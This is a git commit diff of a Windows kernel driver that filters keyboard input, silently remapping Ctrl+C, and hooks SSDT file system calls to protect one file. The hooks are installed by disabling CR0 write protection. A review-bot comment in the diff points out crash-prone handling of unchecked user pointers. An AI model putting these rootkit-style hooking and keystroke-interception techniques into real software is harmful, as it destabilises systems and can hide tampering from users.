update
This commit is contained in:
LycorisGuard 2018-08-14 21:58:47 +08:00
parent 8080e9d7d3
commit 94f523ced9
4 changed files with 865 additions and 995 deletions


@ -3,15 +3,11 @@
# include "FileProtectX86.h"
#endif
ULONG gC2pKeyCount = 0;
PDRIVER_OBJECT gDriverObject = NULL;
BOOLEAN bOk = FALSE;
ULONG_PTR IndexOffsetOfFunction = 0;
ULONG_PTR SSDTDescriptor = 0;
KIRQL Irql;
@ -22,15 +18,11 @@ pfnNtSetInformationFile Old_NtSetInformationFileWinXP = NULL;
pfnNtDeleteFile Old_NtDeleteFileWinXP = NULL;
//pfnNtCreateFile Old_NtCreateFileWinXP = NULL;
pfnNtWriteFile Old_NtWriteFileWinXP = NULL;
NTSTATUS
DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath)
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegisterPath)
{
ULONG i;
NTSTATUS status;
// 填写所有的分发函数的指针
for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
{
@ -55,14 +47,8 @@ NTSTATUS
// 绑定所有键盘设备
status =c2pAttachDevices(DriverObject, RegisterPath);
#ifdef _WIN64
// SSDTDescriptor = GetKeServiceDescriptorTable64(); //获取SSDT表
// IndexOffsetOfFunction = 4;
#else
SSDTDescriptor = (ULONG_PTR)GetFunctionAddressByNameFromNtosExport(L"KeServiceDescriptorTable");
IndexOffsetOfFunction = 1;
#endif
ulIndex = GetSSDTApiFunctionIndexFromNtdll("NtSetInformationFile");
ulIndex1 = GetSSDTApiFunctionIndexFromNtdll("NtWriteFile");
@ -72,9 +58,7 @@ NTSTATUS
HookWrite(ulIndex1);
HookDelete(ulIndex2);
return STATUS_SUCCESS;
}
@ -357,14 +341,11 @@ NTSTATUS c2pReadComplete(
// 获得这个缓冲区的长度。一般的说返回值有多长都保存在
// Information中。
buf_len = Irp->IoStatus.Information;
numKeys = Irp->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA);
__try
{
if (NT_SUCCESS(IoQueryFileDosDeviceName((PFILE_OBJECT)IrpSp->FileObject, &ObjetNameInfor)))
{
if(wcsstr(ObjetNameInfor->Name.Buffer,L"Shine.txt")!=0)
@ -379,34 +360,27 @@ NTSTATUS c2pReadComplete(
}
//通过EProcess获得进程名称
//ͨ¹ýProcess»ñµÃ½ø³ÌÃû³Æ
for(i = 0; i < numKeys; i++)
{
// DbgPrint("%02X %d\n",pKeyData[i].MakeCode,pKeyData[i].Flags);
if(pKeyData[i].MakeCode == 0x1d&&pKeyData[i].Flags ==KEY_MAKE)
if(pKeyData[i].MakeCode == 0x1d && pKeyData[i].Flags == KEY_MAKE)
{
//左Ctrl
bOk = TRUE;
}
if(pKeyData[i].MakeCode == 0x2e&&pKeyData[i].Flags==KEY_MAKE&&bOk==TRUE) //按下
if(pKeyData[i].MakeCode == 0x2e && pKeyData[i].Flags == KEY_MAKE && bOk == TRUE ) //°´ÏÂ
{
pKeyData[i].MakeCode = 0x20;
bOk = FALSE;
DbgPrint("aaaaaaaaaaaaaa");
}
}
//… 这里可以做进一步的处理。我这里很简单的打印出所有的扫
// 描码。
// for(i=0;i<buf_len;++i)
// {
//DbgPrint("ctrl2cap: %2x\r\n", buf[i]);
@ -463,74 +437,51 @@ NTSTATUS c2pDispatchRead(
return IoCallDriver( devExt->LowerDeviceObject, Irp );
}
VOID HookSSDT(ULONG_PTR ulIndex)
{
PULONG32 ServiceTableBase = NULL;
ServiceTableBase = (PULONG32)((PSYSTEM_SERVICE_TABLE32)SSDTDescriptor)->ServiceTableBase; //数组首地址
Old_NtSetInformationFileWinXP = (pfnNtSetInformationFile)ServiceTableBase[ulIndex]; //先保存原先的函数地址
WPOFF();
ServiceTableBase[ulIndex] = (ULONG32)Fake_NtSetInformationFileWinXP; //将KeBugCheckEx函数的偏移地址放入SSDT表中
WPON();
}
VOID HookWrite(ULONG_PTR ulIndex)
{
PULONG32 ServiceTableBase = NULL;
ServiceTableBase = (PULONG32)((PSYSTEM_SERVICE_TABLE32)SSDTDescriptor)->ServiceTableBase; //数组首地址
Old_NtWriteFileWinXP = (pfnNtWriteFile)ServiceTableBase[ulIndex]; //先保存原先的函数地址
WPOFF();
ServiceTableBase[ulIndex] = (ULONG32)Fake_NtWriteFileWinXP; //将KeBugCheckEx函数的偏移地址放入SSDT表中
WPON();
}
VOID HookDelete(ULONG_PTR ulIndex)
{
PULONG32 ServiceTableBase = NULL;
ServiceTableBase = (PULONG32)((PSYSTEM_SERVICE_TABLE32)SSDTDescriptor)->ServiceTableBase; //数组首地址
Old_NtDeleteFileWinXP = (pfnNtDeleteFile)ServiceTableBase[ulIndex]; //先保存原先的函数地址
WPOFF();
ServiceTableBase[ulIndex] = (ULONG32)Fake_NtDeleteFileWinXP; //将KeBugCheckEx函数的偏移地址放入SSDT表中
WPON();
}
VOID
UnHookSSDT(ULONG_PTR ulIndex)
{
PULONG32 ServiceTableBase = NULL;
ServiceTableBase=(PULONG32)((PSYSTEM_SERVICE_TABLE32)SSDTDescriptor)->ServiceTableBase;
WPOFF();
ServiceTableBase[ulIndex] = (ULONG32)Old_NtSetInformationFileWinXP;
WPON();
}
VOID
UnHookSSDTWrite(ULONG_PTR ulIndex)
{
@ -544,25 +495,18 @@ VOID
}
VOID
UnHookSSDTDelete(ULONG_PTR ulIndex)
{
PULONG32 ServiceTableBase = NULL;
ServiceTableBase=(PULONG32)((PSYSTEM_SERVICE_TABLE32)SSDTDescriptor)->ServiceTableBase;
WPOFF();
ServiceTableBase[ulIndex] = (ULONG32)Old_NtDeleteFileWinXP;
WPON();
}
NTSTATUS Fake_NtSetInformationFileWinXP(
__in HANDLE FileHandle,
__out PIO_STATUS_BLOCK IoStatusBlock,
@ -582,14 +526,14 @@ NTSTATUS Fake_NtSetInformationFileWinXP(
{
if(wcsstr((ObjetNameInfor->Name).Buffer,L"D:\\Shine.txt"))
{
if(FileInformationClass==FileRenameInformation)
if(FileInformationClass == FileRenameInformation)
{
return;
return STATUS_ACCESS_DENIED;
}
}
}
Old_NtSetInformationFileWinXP(FileHandle,IoStatusBlock,FileInformation,Length,FileInformationClass);
return Old_NtSetInformationFileWinXP(FileHandle,IoStatusBlock,FileInformation,Length,FileInformationClass);
}
NTSTATUS
@ -605,8 +549,6 @@ NTSTATUS
__in_opt PULONG Key
)
{
NTSTATUS Status;
PFILE_OBJECT hObject;
POBJECT_NAME_INFORMATION ObjetNameInfor;
@ -618,11 +560,11 @@ NTSTATUS
{
if(wcsstr((ObjetNameInfor->Name).Buffer,L"D:\\Shine.txt"))
{
return;
return STATUS_ACCESS_DENIED;
}
}
Old_NtWriteFileWinXP(FileHandle,Event,ApcRoutine,ApcContext,IoStatusBlock,Buffer,Length,ByteOffset,Key);
return Old_NtWriteFileWinXP(FileHandle,Event,ApcRoutine,ApcContext,IoStatusBlock,Buffer,Length,ByteOffset,Key);
}
@ -632,10 +574,9 @@ NTSTATUS Fake_NtDeleteFileWinXP(
{
if(wcsstr((ObjectAttributes->ObjectName)->Buffer,L"D:\\Shine.txt"))
{
return;
return STATUS_ACCESS_DENIED;
}
Old_NtDeleteFileWinXP(ObjectAttributes);
return Old_NtDeleteFileWinXP(ObjectAttributes);
}
@ -655,36 +596,6 @@ PVOID
return FunctionAddress;
}
PVOID GetKeServiceDescriptorTable64()
{
PUCHAR StartSearchAddress = (PUCHAR)__readmsr(0xC0000082);
PUCHAR EndSearchAddress = StartSearchAddress + 0x500;
PUCHAR i = NULL;
UCHAR b1=0,b2=0,b3=0;
ULONG_PTR ulv1 = 0;
PVOID FunctionAddress = 0;
for(i=StartSearchAddress;i<EndSearchAddress;i++)
{
if( MmIsAddressValid(i) && MmIsAddressValid(i+1) && MmIsAddressValid(i+2) )
{
b1=*i;
b2=*(i+1);
b3=*(i+2);
if( b1==0x4c && b2==0x8d && b3==0x15 )
{
memcpy(&ulv1,i+3,4);
FunctionAddress = (ULONG_PTR)ulv1 + (ULONG_PTR)i + 7;
return FunctionAddress;
}
}
}
return 0;
}
LONG GetSSDTApiFunctionIndexFromNtdll(char* szFindFunctionName)
{
@ -705,9 +616,7 @@ LONG GetSSDTApiFunctionIndexFromNtdll(char* szFindFunctionName)
Status = MapFileInUserSpace(wzNtdll, NtCurrentProcess(), &MapBase, &ViewSize);
if (!NT_SUCCESS(Status))
{
return STATUS_UNSUCCESSFUL;
}
else
{
@ -745,10 +654,6 @@ LONG GetSSDTApiFunctionIndexFromNtdll(char* szFindFunctionName)
return ulIndex;
}
NTSTATUS
MapFileInUserSpace(WCHAR* wzFilePath,IN HANDLE hProcess OPTIONAL,
OUT PVOID *BaseAddress,
@ -808,7 +713,6 @@ NTSTATUS
if (!NT_SUCCESS(Status))
{
return Status;
}
if (!hProcess){
@ -835,10 +739,6 @@ NTSTATUS
return Status;
}
ULONG_PTR GetFunctionAddressByIndexFromSSDT32(ULONG_PTR ulIndex,ULONG_PTR SSDTDescriptor)
{
ULONG_PTR ServiceTableBase= 0 ;
@ -849,23 +749,6 @@ ULONG_PTR GetFunctionAddressByIndexFromSSDT32(ULONG_PTR ulIndex,ULONG_PTR SSDTDe
return (*(PULONG_PTR)(ServiceTableBase + 4 * ulIndex));
}
ULONG_PTR GetFunctionAddressByIndexFromSSDT64(ULONG_PTR ulIndex,ULONG_PTR SSDTDescriptor)
{
LONG ulv1 = 0;
ULONG_PTR ulv2 = 0;
ULONG_PTR ServiceTableBase= 0 ;
PSYSTEM_SERVICE_TABLE64 SSDT = (PSYSTEM_SERVICE_TABLE64)SSDTDescriptor;
ServiceTableBase=(ULONG_PTR)(SSDT ->ServiceTableBase);
ulv2 = ServiceTableBase + 4 * ulIndex;
ulv1 = *(PLONG)ulv2;
ulv1 = ulv1>>4;
return ServiceTableBase + (ULONG_PTR)ulv1;
}
VOID WPOFF()
{
ULONG_PTR cr0 = 0;
@ -873,16 +756,14 @@ VOID WPOFF()
cr0 =__readcr0();
cr0 &= 0xfffffffffffeffff;
__writecr0(cr0);
// _disable(); //这句话 屏蔽也没有啥
//_disable();
}
VOID WPON()
{
ULONG_PTR cr0=__readcr0();
cr0 |= 0x10000;
// _enable(); //这句话 屏蔽也没有啥
//_enable();
__writecr0(cr0);
KeLowerIrql(Irql);
}
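Review bot: In Fake_NtDeleteFileWinXP the new `return STATUS_ACCESS_DENIED;` path still reaches `wcsstr((ObjectAttributes->ObjectName)->Buffer, L"D:\\Shine.txt")` with pointers taken straight from the caller: in an SSDT hook those are user-mode addresses, nothing probes them, there is no `__try/__except`, and a UNICODE_STRING buffer is not guaranteed NUL-terminated, so an unprivileged process can bugcheck the machine with a bad pointer or make `wcsstr` read past an unterminated name. Independently, `wcsstr` is case-sensitive while NTFS is not, so a delete of `d:\shine.txt` (and presumably an 8.3 or `\Device\HarddiskVolumeN\...` spelling) walks past the check; the write and rename hooks above use the same substring test against the IoQueryFileDosDeviceName result. Probe and copy the name into a kernel buffer under `__try` — only when `ExGetPreviousMode() != KernelMode`, since kernel callers pass kernel addresses that ProbeForRead rejects — and compare the tail case-insensitively with `RtlSuffixUnicodeString`, as sketched below; even then the original NtDeleteFile re-reads the user buffer, so treat this as a path-string filter rather than a hard guarantee. The function's signature and locals sit above the hunk.
```c
    /* … unchanged: signature and existing locals above the hunk; add these declarations with them … */
    UNICODE_STRING protectedName = RTL_CONSTANT_STRING(L"D:\\Shine.txt");
    UNICODE_STRING name;
    WCHAR nameTail[64];
    USHORT copyLen;

    __try
    {
        if (ExGetPreviousMode() != KernelMode)
        {
            ProbeForRead(ObjectAttributes, sizeof(*ObjectAttributes), sizeof(ULONG));
            ProbeForRead(ObjectAttributes->ObjectName, sizeof(UNICODE_STRING), sizeof(ULONG));
        }
        name = *ObjectAttributes->ObjectName;            /* capture Length/Buffer once */
        if (ExGetPreviousMode() != KernelMode)
        {
            ProbeForRead(name.Buffer, name.Length, sizeof(WCHAR));
        }
        /* only the tail matters for a suffix match; compare a kernel copy, never user memory */
        copyLen = (name.Length < sizeof(nameTail)) ? name.Length : (USHORT)sizeof(nameTail);
        RtlCopyMemory(nameTail, (PUCHAR)name.Buffer + (name.Length - copyLen), copyLen);
        name.Buffer = nameTail;
        name.Length = name.MaximumLength = copyLen;
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        return GetExceptionCode();
    }

    /* NTFS is case-insensitive: match "...D:\Shine.txt" regardless of case */
    if (RtlSuffixUnicodeString(&protectedName, &name, TRUE))
    {
        return STATUS_ACCESS_DENIED;
    }
    return Old_NtDeleteFileWinXP(ObjectAttributes);
```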


@ -15,14 +15,6 @@ NTSTATUS
#define SEC_IMAGE 0x01000000
typedef struct _SYSTEM_SERVICE_TABLE64{
PVOID ServiceTableBase;
PVOID ServiceCounterTableBase;
ULONG64 NumberOfServices;
PVOID ParamTableBase;
} SYSTEM_SERVICE_TABLE64, *PSYSTEM_SERVICE_TABLE64;
typedef struct _SYSTEM_SERVICE_TABLE32 {
PVOID ServiceTableBase;
PVOID ServiceCounterTableBase;
@ -147,9 +139,6 @@ NTSYSAPI
RtlImageNtHeader(PVOID Base);
PVOID GetFunctionAddressByNameFromSSDT(CHAR* szFunctionName,ULONG_PTR SSDTDescriptor);
ULONG_PTR GetFunctionAddressByIndexFromSSDT64(ULONG_PTR ulIndex,ULONG_PTR SSDTDescriptor);
PVOID GetKeServiceDescriptorTable64();
ULONG_PTR GetFunctionAddressByIndexFromSSDT32(ULONG_PTR ulIndex,ULONG_PTR SSDTDescriptor);
PVOID
GetFunctionAddressByNameFromNtosExport(WCHAR *wzFunctionName);